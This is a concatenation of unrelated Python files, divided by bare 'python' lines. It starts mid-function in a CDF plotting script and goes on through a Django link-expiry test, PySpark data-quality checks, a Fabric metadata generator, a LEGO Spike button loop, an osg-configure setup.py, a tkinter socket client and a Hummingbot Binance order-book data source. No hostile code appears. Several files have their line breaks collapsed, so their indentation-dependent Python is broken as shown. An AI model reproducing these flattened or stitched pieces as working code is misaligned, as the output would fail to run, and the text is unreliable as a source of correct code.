max(variance) plt.figure() plt.xlim(0.99 * xlim_min, 1.02 * xlim_max) p = plt.plot(bin_edges[1:], cdf, 'b', label='Variance of GTOD') plt.legend(loc='lower right') plt.xlabel('Absolute Variance / Microseconds', fontsize=20) plt.ylabel('Cumulative Distribution', fontsize=20) plt.grid(True) #plt.show() plt.savefig('var_%s_cdf.eps' % topic_name, format='eps') def main(): """draw 2 cdf figures""" data1 = np.loadtxt(bsl_file) data2 = np.loadtxt(vir_file) font = {'size':16} matplotlib.rc('lines', lw=2) matplotlib.rc('font', **font) plot_compare_cdf(data1, data2) plot_err_cdf(data1, data2) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-b', '--bsl_file', action='store') parser.add_argument('-v', '--vir_file', action='store') parser.add_argument('-d', '--dilation', action='store', default=1, type=int) parser.add_argument('--label1', action='store') parser.add_argument('--label2', action='store') parser.add_argument('--label_err', action='store', default='Abs Error') parser.add_argument('--topic_name', action='store') results = parser.parse_args() bsl_file = results.bsl_file vir_file = results.vir_file dilation = results.dilation label1 = results.label1 label2 = results.label2 topic_name = results.topic_name label_err = results.label_err main()
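# Example invocation (the script and data file names are hypothetical; the flags
# are the ones registered with argparse above):
#
#   python plot_cdf.py -b baseline_rtt.txt -v virtual_rtt.txt \
#       --label1 "Baseline" --label2 "Virtualized" --topic_name ping
#
# With --topic_name ping this writes cmp_ping_cdf.eps and err_ping_cdf.eps to
# the current directory.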
python
from datetime import timedelta

from django.test import TestCase
from django.core.exceptions import ValidationError
from django.utils import timezone

from url_shortener.links.models import Link


class LinkTest(TestCase):
    def create_link(self, expires_at=None, short_url="asdf", full_url="https://google.com"):
        return Link.objects.create(short_url=short_url, full_url=full_url, expires_at=expires_at)

    def test_creation_of_link(self):
        link = self.create_link()
        assert isinstance(link, Link)

    def test_has_expired(self):
        yesterday = timezone.now() - timedelta(days=1)
        link = self.create_link(expires_at=yesterday)
        assert link.has_expired

        tomorrow = timezone.now() + timedelta(days=1)
        link_2 = self.create_link(expires_at=tomorrow, short_url="banan")
        assert not link_2.has_expired
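# The tests above exercise Link.has_expired, but the model itself is not part of
# this file. A minimal sketch of what such a model could look like (an assumed
# illustration, not the actual url_shortener.links.models implementation):
#
#     from django.db import models
#     from django.utils import timezone
#
#     class Link(models.Model):
#         short_url = models.CharField(max_length=50, unique=True)
#         full_url = models.URLField()
#         expires_at = models.DateTimeField(null=True, blank=True)
#
#         @property
#         def has_expired(self):
#             return self.expires_at is not None and self.expires_at < timezone.now()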
python
import configparser
from datetime import datetime
import os
import sys

from pyspark.sql import SparkSession
from pyspark.sql import functions as F
from pyspark.sql.functions import col, count
from pyspark.sql.types import DateType


def create_spark_session():
    spark = SparkSession \
        .builder \
        .config("spark.jars.packages", "org.apache.hadoop:hadoop-aws:2.7.0") \
        .getOrCreate()
    return spark


def check_music_data(spark, datalake_bucket):
    music_df = spark.read.parquet(os.path.join(datalake_bucket, 'music_table/*.parquet'))
    if music_df.count() == 0:
        raise AssertionError('Music table is empty.')
    if music_df.where(col("track_id").isNull()).count() > 0:
        raise AssertionError('Primary key cannot be null.')


def check_lyrics_data(spark, datalake_bucket):
    lyrics_df = spark.read.parquet(os.path.join(datalake_bucket, 'lyrics_table/*.parquet'))
    if lyrics_df.count() == 0:
        raise AssertionError('Lyrics table is empty.')
    if lyrics_df.select(F.countDistinct("track_name")).first()[0] != lyrics_df.select(F.count("track_name")).first()[0]:
        raise AssertionError('Primary key should be unique.')


def check_track_data(spark, datalake_bucket):
    track_df = spark.read.parquet(os.path.join(datalake_bucket, 'track_table/*.parquet'))
    if track_df.count() == 0:
        raise AssertionError('Track table is empty.')
    if dict(track_df.dtypes)['count_words'] != 'int':
        raise AssertionError('Data type mis-match.')


def check_song_data(spark, datalake_bucket):
    song_df = spark.read.parquet(os.path.join(datalake_bucket, 'song_table/*.parquet'))
    if song_df.count() == 0:
        raise AssertionError('Song table is empty.')


def check_artists_data(spark, datalake_bucket):
    artists_df = spark.read.parquet(os.path.join(datalake_bucket, 'artists_table/*.parquet'))
    if artists_df.count() == 0:
        raise AssertionError('Artists table is empty.')


def check_features_data(spark, datalake_bucket):
    features_df = spark.read.parquet(os.path.join(datalake_bucket, 'features_table/*.parquet'))
    if features_df.count() == 0:
        raise AssertionError('Features table is empty.')


def main():
    if len(sys.argv) == 2:
        datalake_bucket = sys.argv[1]
    else:
        config = configparser.ConfigParser()
        config.read('../dl.cfg')
        os.environ['AWS_ACCESS_KEY_ID'] = config['AWS']['AWS_ACCESS_KEY_ID']
        os.environ['AWS_SECRET_ACCESS_KEY'] = config['AWS']['AWS_SECRET_ACCESS_KEY']
        datalake_bucket = 's3a://' + config['S3']['BIKESHARE_DATALAKE_BUCKET'] + '/'

    spark = create_spark_session()
    check_music_data(spark, datalake_bucket)
    check_lyrics_data(spark, datalake_bucket)
    check_track_data(spark, datalake_bucket)
    check_song_data(spark, datalake_bucket)
    check_artists_data(spark, datalake_bucket)
    check_features_data(spark, datalake_bucket)


if __name__ == "__main__":
    main()
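# Example of pointing the checks at an explicit bucket (the script file name and
# bucket are hypothetical; without an argument the script falls back to ../dl.cfg
# as coded in main() above):
#
#   spark-submit data_quality_checks.py s3a://my-datalake-bucket/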
python
from src.loader.interface import ILoader
from src.loader.impl import DataLoader
python
#!/usr/bin/python import sys, re import fabric.docs import fabric, simplejson, inspect, pprint from lib import fabfile action_dir = "./" def generate_meta(fabfile): for i in dir(fabfile): action_meta = {} fabtask = getattr(fabfile,i) if isinstance(fabtask,fabric.tasks.WrappedCallableTask): print "%s is a Fabric Callable Task..." % i fabparams = getArgs(i,fabfile) print "\n" try: action_meta['name'] = fabtask.wrapped.func_name action_meta['description'] = fabtask.wrapped.func_doc except TypeError, e: print e next action_meta['entry_point'] = "fabaction.py" action_meta['runner_type'] = "run-local-script" action_meta['enabled'] = True parameters = {} parameters['kwarg_op'] = {"immutable": True, "type": "string", "default": ""} parameters['user'] = {"immutable": True} parameters['dir'] = {"immutable": True} parameters["task"] = { "type": "string", "description": "task name to be executed", "immutable": True, "default": fabtask.wrapped.func_name } if fabparams: parameters.update(fabparams) action_meta['parameters'] = parameters fname = action_dir + action_meta['name'] + ".json" try: print "Writing %s..." % fname fh = open(fname, 'w') fh.write(simplejson.dumps(action_meta,indent=2,sort_keys=True)) except: print "Could not write file %s" % fname next print "\n" def getArgs(task, fabfile): args = {} sourcelines = inspect.getsourcelines(fabfile)[0] for i, line in enumerate(sourcelines): line = line.rstrip() pattern = re.compile('def ' + task + '\(') if pattern.search(line): filtered = filter(None,re.split('\((.*)\):.*',line)) if len(filtered) < 2: return None argstring = filtered[1] for arg in argstring.split(','): if re.search('=',arg): arg,v = arg.split('=') if v == "''" or v == '""' or v == 'None': value={"type":"string"} else: value={"type":"string","default":v.strip()} else: value={"type":"string"} args[arg.strip()]=value return args generate_meta(fabfile)
python
from spike import PrimeHub

hub = PrimeHub()

while True:
    if hub.left_button.was_pressed():
        print("Left button was Pressed")
    elif hub.right_button.was_pressed():
        print("Right button was Pressed")
python
from distutils.core import setup import glob, os from osg_configure.version import __version__ def get_data_files(): """ Generates a list of data files for packaging and locations where they should be placed """ # create a list of test files fileList = [] for root, subFolders, files in os.walk('tests'): for name in files: fileList.append(os.path.join(root, name)) temp = filter(lambda x: '.svn' not in x, fileList) temp = filter(lambda x: not os.path.isdir(x), temp) temp = map(lambda x: (x.replace('tests', '/usr/share/osg-configure/tests', 1), x), temp) file_mappings = {} for (dest, source) in temp: dest_dir = os.path.dirname(dest) if dest_dir in file_mappings: file_mappings[dest_dir].append(source) else: file_mappings[dest_dir] = [source] data_file_list = [] for key in file_mappings: data_file_list.append((key, file_mappings[key])) # generate config file entries data_file_list.append(('/etc/osg/config.d', glob.glob('config/*.ini'))) # add grid3-locations file data_file_list.append(('/etc/osg/', ['data_files/grid3-locations.txt'])) return data_file_list setup(name='osg-configure', version=__version__, description='Package for osg-configure and associated scripts', author='Suchandra Thapa', maintainer='Matyas Selmeci', maintainer_email='[email protected]', url='http://www.opensciencegrid.org', packages=['osg_configure', 'osg_configure.modules', 'osg_configure.configure_modules'], scripts=['scripts/osg-configure'], data_files=get_data_files(), classifiers=[ "Development Status :: 6 - Mature", "Environment :: Console", "Intended Audience :: System Administrators", "License :: OSI Approved :: Apache Software License", "Operating System :: POSIX :: Linux", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", ], platforms=["Linux"], license="Apache Software License 2.0" )
python
import socket
from tkinter import *

# Python socket client by Jeferson Oliveira
# THIS IS THE CLIENT; THIS CODE SHOULD BE ADAPTED INTO THE PROJECT

HOST = 'ip'  # SET THE SERVER IP
PORT = 11000

tela = Tk()


def LerComando(comando):
    if comando == "b1":
        botao['text'] = "1"


def de():
    # THIS FUNCTION TELLS THE SERVER THE CLIENT IS ONLINE; IT RUNS IN A LOOP
    EnviarMenssagem("on")
    tela.after(100, de)


def EnviarMenssagem(msg):
    try:  # FOR ERROR HANDLING
        CLIENTE = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        CLIENTE.connect((HOST, PORT))
        CLIENTE.sendall(str.encode(msg))
        data = CLIENTE.recv(1024)
        print("Server response:", data.decode())
        CLIENTE.close()
        LerComando(data.decode())
        data = ""
    except:
        CLIENTE.close()


# EXAMPLE WITH A BUTTON =====================
def btn1clique():  # METHOD FOR THE BUTTON CLICK EVENT
    botao['text'] = "1"  # THE BUTTON TEXT WILL CHANGE TO 1
    EnviarMenssagem("b1")  # SENDS THIS INFORMATION TO THE SOCKET SERVER


tela.title('Example')  # TITLE OF THE FORM WINDOW
tela.geometry('720x500')  # WINDOW SIZE

botao = Button(tela, text=" ", command=lambda: btn1clique())  # CREATES A BUTTON WHOSE CLICK EVENT CALLS btn1clique()
botao.grid()  # DRAWS THE BUTTON ON THE SCREEN
botao['width'] = 30  # SETS THE BUTTON'S HORIZONTAL SIZE
botao['height'] = 20  # SETS THE BUTTON'S HEIGHT

tela.after(100, de)
tela.mainloop()  # PUTS THE FORM INTO ITS MAIN LOOP
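# A minimal sketch of a matching server (assumed for illustration; the real
# server is not part of this file). Echoing each received command back is enough
# for LerComando() above to react to "b1":
#
#     import socket
#
#     server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     server.bind(("", 11000))  # same port the client uses
#     server.listen()
#     while True:
#         conn, addr = server.accept()
#         with conn:
#             data = conn.recv(1024)
#             if data:
#                 conn.sendall(data)  # echo the command back to the client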
python
import asyncio import copy import logging import time from collections import defaultdict from decimal import Decimal from typing import Any, Dict, List, Mapping, Optional from bidict import bidict, ValueDuplicationError import hummingbot.connector.derivative.binance_perpetual.binance_perpetual_utils as utils import hummingbot.connector.derivative.binance_perpetual.binance_perpetual_web_utils as web_utils import hummingbot.connector.derivative.binance_perpetual.constants as CONSTANTS from hummingbot.connector.derivative.binance_perpetual.binance_perpetual_order_book import BinancePerpetualOrderBook from hummingbot.connector.time_synchronizer import TimeSynchronizer from hummingbot.connector.utils import combine_to_hb_trading_pair from hummingbot.core.api_throttler.async_throttler import AsyncThrottler from hummingbot.core.data_type.funding_info import FundingInfo from hummingbot.core.data_type.order_book import OrderBook from hummingbot.core.data_type.order_book_message import OrderBookMessage from hummingbot.core.data_type.order_book_tracker_data_source import OrderBookTrackerDataSource from hummingbot.core.utils.async_utils import safe_gather from hummingbot.core.web_assistant.connections.data_types import ( RESTMethod, WSRequest, WSResponse, ) from hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory from hummingbot.core.web_assistant.ws_assistant import WSAssistant from hummingbot.logger import HummingbotLogger class BinancePerpetualAPIOrderBookDataSource(OrderBookTrackerDataSource): _bpobds_logger: Optional[HummingbotLogger] = None _trading_pair_symbol_map: Dict[str, Mapping[str, str]] = {} _mapping_initialization_lock = asyncio.Lock() def __init__( self, trading_pairs: List[str] = None, domain: str = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: Optional[WebAssistantsFactory] = None, time_synchronizer: Optional[TimeSynchronizer] = None, ): super().__init__(trading_pairs) self._time_synchronizer = time_synchronizer self._domain = domain self._throttler = throttler self._api_factory: WebAssistantsFactory = api_factory or web_utils.build_api_factory( throttler=self._throttler, time_synchronizer=self._time_synchronizer, domain=self._domain, ) self._order_book_create_function = lambda: OrderBook() self._funding_info: Dict[str, FundingInfo] = {} self._message_queue: Dict[int, asyncio.Queue] = defaultdict(asyncio.Queue) @property def funding_info(self) -> Dict[str, FundingInfo]: return copy.deepcopy(self._funding_info) def is_funding_info_initialized(self) -> bool: return all(trading_pair in self._funding_info for trading_pair in self._trading_pairs) @classmethod def logger(cls) -> HummingbotLogger: if cls._bpobds_logger is None: cls._bpobds_logger = logging.getLogger(__name__) return cls._bpobds_logger @classmethod async def get_last_traded_prices(cls, trading_pairs: List[str], domain: str = CONSTANTS.DOMAIN) -> Dict[str, float]: tasks = [cls.get_last_traded_price(t_pair, domain) for t_pair in trading_pairs] results = await safe_gather(*tasks) return {t_pair: result for t_pair, result in zip(trading_pairs, results)} @classmethod async def get_last_traded_price(cls, trading_pair: str, domain: str = CONSTANTS.DOMAIN, api_factory: Optional[WebAssistantsFactory] = None, throttler: Optional[AsyncThrottler] = None, time_synchronizer: Optional[TimeSynchronizer] = None) -> float: params = {"symbol": await cls.convert_to_exchange_trading_pair( hb_trading_pair=trading_pair, domain=domain, throttler=throttler, api_factory=api_factory, 
time_synchronizer=time_synchronizer)} response = await web_utils.api_request( path=CONSTANTS.TICKER_PRICE_CHANGE_URL, api_factory=api_factory, throttler=throttler, time_synchronizer=time_synchronizer, domain=domain, params=params, method=RESTMethod.GET) return float(response["lastPrice"]) @classmethod def trading_pair_symbol_map_ready(cls, domain: str = CONSTANTS.DOMAIN): """ Checks if the mapping from exchange symbols to client trading pairs has been initialized :param domain: the domain of the exchange being used :return: True if the mapping has been initialized, False otherwise """ return domain in cls._trading_pair_symbol_map and len(cls._trading_pair_symbol_map[domain]) > 0 @classmethod async def trading_pair_symbol_map( cls, domain: Optional[str] = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: WebAssistantsFactory = None, time_synchronizer: Optional[TimeSynchronizer] = None ) -> Mapping[str, str]: if not cls.trading_pair_symbol_map_ready(domain=domain): async with cls._mapping_initialization_lock: # Check condition again (could have been initialized while waiting for the lock to be released) if not cls.trading_pair_symbol_map_ready(domain=domain): await cls.init_trading_pair_symbols(domain, throttler, api_factory, time_synchronizer) return cls._trading_pair_symbol_map[domain] @classmethod async def init_trading_pair_symbols( cls, domain: str = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: WebAssistantsFactory = None, time_synchronizer: Optional[TimeSynchronizer] = None ): """Initialize _trading_pair_symbol_map class variable""" mapping = bidict() try: data = await web_utils.api_request( path=CONSTANTS.EXCHANGE_INFO_URL, api_factory=api_factory, throttler=throttler, time_synchronizer=time_synchronizer, domain=domain, method=RESTMethod.GET, timeout=10) for symbol_data in filter(utils.is_exchange_information_valid, data["symbols"]): try: mapping[symbol_data["pair"]] = combine_to_hb_trading_pair( symbol_data["baseAsset"], symbol_data["quoteAsset"]) except ValueDuplicationError: continue except Exception as ex: cls.logger().exception(f"There was an error requesting exchange info ({str(ex)})") cls._trading_pair_symbol_map[domain] = mapping @staticmethod async def fetch_trading_pairs( domain: str = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: Optional[WebAssistantsFactory] = None, time_synchronizer: Optional[TimeSynchronizer] = None, ) -> List[str]: trading_pair_list: List[str] = [] symbols_map = await BinancePerpetualAPIOrderBookDataSource.trading_pair_symbol_map( domain=domain, throttler=throttler, api_factory=api_factory, time_synchronizer=time_synchronizer) trading_pair_list.extend(list(symbols_map.values())) return trading_pair_list @classmethod async def convert_from_exchange_trading_pair( cls, exchange_trading_pair: str, domain: str = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: Optional[WebAssistantsFactory] = None, time_synchronizer: Optional[TimeSynchronizer] = None) -> str: symbol_map = await cls.trading_pair_symbol_map( domain=domain, throttler=throttler, api_factory=api_factory, time_synchronizer=time_synchronizer) try: pair = symbol_map[exchange_trading_pair] except KeyError: raise ValueError(f"There is no symbol mapping for exchange trading pair {exchange_trading_pair}") return pair @classmethod async def convert_to_exchange_trading_pair( cls, hb_trading_pair: str, domain=CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: 
Optional[WebAssistantsFactory] = None, time_synchronizer: Optional[TimeSynchronizer] = None) -> str: symbol_map = await cls.trading_pair_symbol_map( domain=domain, throttler=throttler, api_factory=api_factory, time_synchronizer=time_synchronizer) try: symbol = symbol_map.inverse[hb_trading_pair] except KeyError: raise ValueError(f"There is no symbol mapping for trading pair {hb_trading_pair}") return symbol @staticmethod async def get_snapshot( trading_pair: str, limit: int = 1000, domain: str = CONSTANTS.DOMAIN, throttler: Optional[AsyncThrottler] = None, api_factory: Optional[WebAssistantsFactory] = None, time_synchronizer: Optional[TimeSynchronizer] = None ) -> Dict[str, Any]: params = {"symbol": await BinancePerpetualAPIOrderBookDataSource.convert_to_exchange_trading_pair( hb_trading_pair=trading_pair, domain=domain, throttler=throttler, api_factory=api_factory, time_synchronizer=time_synchronizer)} if limit != 0: params.update({"limit": str(limit)}) data = await web_utils.api_request( path=CONSTANTS.SNAPSHOT_REST_URL, api_factory=api_factory, throttler=throttler, time_synchronizer=time_synchronizer, domain=domain, params=params, method=RESTMethod.GET) return data async def get_new_order_book(self, trading_pair: str) -> OrderBook: snapshot: Dict[str, Any] = await self.get_snapshot(trading_pair, 1000, self._domain, self._throttler, self._api_factory) snapshot_timestamp: float = time.time() snapshot_msg: OrderBookMessage = BinancePerpetualOrderBook.snapshot_message_from_exchange( snapshot, snapshot_timestamp, metadata={"trading_pair": trading_pair} ) order_book = self.order_book_create_function() order_book.apply_snapshot(snapshot_msg.bids, snapshot_msg.asks, snapshot_msg.update_id) return order_book async def _get_funding_info_from_exchange(self, trading_pair: str) -> FundingInfo: """ Fetches the funding information of the given trading pair from the exchange REST API. Parses and returns the respsonse as a FundingInfo data object. :param trading_pair: Trading pair of which its Funding Info is to be fetched :type trading_pair: str :return: Funding Information of the given trading pair :rtype: FundingInfo """ params = {"symbol": await self.convert_to_exchange_trading_pair( hb_trading_pair=trading_pair, domain=self._domain, throttler=self._throttler, api_factory=self._api_factory, time_synchronizer=self._time_synchronizer)} try: data = await web_utils.api_request( path=CONSTANTS.MARK_PRICE_URL, api_factory=self._api_factory, throttler=self._throttler, time_synchronizer=self._time_synchronizer, domain=self._domain, params=params, method=RESTMethod.GET) except asyncio.CancelledError: raise except Exception as exception: self.logger().exception(f"There was a problem getting funding info from exchange. Error: {exception}") return None funding_info = FundingInfo( trading_pair=trading_pair, index_price=Decimal(data["indexPrice"]), mark_price=Decimal(data["markPrice"]), next_funding_utc_timestamp=int(data["nextFundingTime"]), rate=Decimal(data["lastFundingRate"]), ) return funding_info async def get_funding_info(self, trading_pair: str) -> FundingInfo: """ Returns the FundingInfo of the specified trading pair. If it does not exist, it will query the REST API. 
""" if trading_pair not in self._funding_info: self._funding_info[trading_pair] = await self._get_funding_info_from_exchange(trading_pair) return self._funding_info[trading_pair] async def _subscribe_to_order_book_streams(self) -> WSAssistant: url = f"{web_utils.wss_url(CONSTANTS.PUBLIC_WS_ENDPOINT, self._domain)}" ws: WSAssistant = await self._api_factory.get_ws_assistant() await ws.connect(ws_url=url, ping_timeout=CONSTANTS.HEARTBEAT_TIME_INTERVAL) stream_id_channel_pairs = [ (CONSTANTS.DIFF_STREAM_ID, "@depth"), (CONSTANTS.TRADE_STREAM_ID, "@aggTrade"), (CONSTANTS.FUNDING_INFO_STREAM_ID, "@markPrice"), ] for stream_id, channel in stream_id_channel_pairs: params = [] for trading_pair in self._trading_pairs: symbol = await self.convert_to_exchange_trading_pair( hb_trading_pair=trading_pair, domain=self._domain, throttler=self._throttler, api_factory=self._api_factory, time_synchronizer=self._time_synchronizer) params.append(f"{symbol.lower()}{channel}") payload = { "method": "SUBSCRIBE", "params": params, "id": stream_id, } subscribe_request: WSRequest = WSRequest(payload) await ws.send(subscribe_request) return ws async def listen_for_subscriptions(self): ws = None while True: try: ws = await self._subscribe_to_order_book_streams() async for msg in ws.iter_messages(): if "result" in msg.data: continue if "@depth" in msg.data["stream"]: self._message_queue[CONSTANTS.DIFF_STREAM_ID].put_nowait(msg) elif "@aggTrade" in msg.data["stream"]: self._message_queue[CONSTANTS.TRADE_STREAM_ID].put_nowait(msg) elif "@markPrice" in msg.data["stream"]: self._message_queue[CONSTANTS.FUNDING_INFO_STREAM_ID].put_nowait(msg) except asyncio.CancelledError: raise except Exception: self.logger().error( "Unexpected error with Websocket connection. Retrying after 30 seconds...", exc_info=True ) await self._sleep(30.0) finally: ws and await ws.disconnect() async def listen_for_order_book_diffs(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue): while True: msg = await self._message_queue[CONSTANTS.DIFF_STREAM_ID].get() timestamp: float = time.time() msg.data["data"]["s"] = await self.convert_from_exchange_trading_pair( exchange_trading_pair=msg.data["data"]["s"], domain=self._domain, throttler=self._throttler, api_factory=self._api_factory, time_synchronizer=self._time_synchronizer) order_book_message: OrderBookMessage = BinancePerpetualOrderBook.diff_message_from_exchange( msg.data, timestamp ) output.put_nowait(order_book_message) async def listen_for_trades(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue): while True: msg = await self._message_queue[CONSTANTS.TRADE_STREAM_ID].get() msg.data["data"]["s"] = await self.convert_from_exchange_trading_pair( exchange_trading_pair=msg.data["data"]["s"], domain=self._domain, throttler=self._throttler, api_factory=self._api_factory, time_synchronizer=self._time_synchronizer) trade_message: OrderBookMessage = BinancePerpetualOrderBook.trade_message_from_exchange(msg.data) output.put_nowait(trade_message) async def listen_for_order_book_snapshots(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue): while True: try: for trading_pair in self._trading_pairs: snapshot: Dict[str, Any] = await self.get_snapshot( trading_pair, domain=self._domain, throttler=self._throttler, api_factory=self._api_factory ) snapshot_timestamp: float = time.time() snapshot_msg: OrderBookMessage = BinancePerpetualOrderBook.snapshot_message_from_exchange( snapshot, snapshot_timestamp, metadata={"trading_pair": trading_pair} ) output.put_nowait(snapshot_msg) 
self.logger().debug(f"Saved order book snapshot for {trading_pair}") delta = CONSTANTS.ONE_HOUR - time.time() % CONSTANTS.ONE_HOUR await self._sleep(delta) except asyncio.CancelledError: raise except Exception: self.logger().error( "Unexpected error occurred fetching orderbook snapshots. Retrying in 5 seconds...", exc_info=True ) await self._sleep(5.0) async def listen_for_funding_info(self): """ Listen for funding information events received through the websocket channel to update the respective FundingInfo for all active trading pairs. """ while True: try: funding_info_message: WSResponse = await self._message_queue[CONSTANTS.FUNDING_INFO_STREAM_ID].get() data: Dict[str, Any] = funding_info_message.data["data"] trading_pair: str = await self.convert_from_exchange_trading_pair( exchange_trading_pair=data["s"], domain=self._domain, throttler=self._throttler, api_factory=self._api_factory, time_synchronizer=self._time_synchronizer) if trading_pair not in self._trading_pairs: continue self._funding_info.update( { trading_pair: FundingInfo( trading_pair=trading_pair, index_price=Decimal(data["i"]), mark_price=Decimal(data["p"]), next_funding_utc_timestamp=int(data["T"]), rate=Decimal(data["r"]), ) } ) except asyncio.CancelledError: raise except Exception as e: self.logger().error( f"Unexpected error occured updating funding information. Retrying in 5 seconds... Error: {str(e)}", exc_info=True, ) await self._sleep(5.0)
python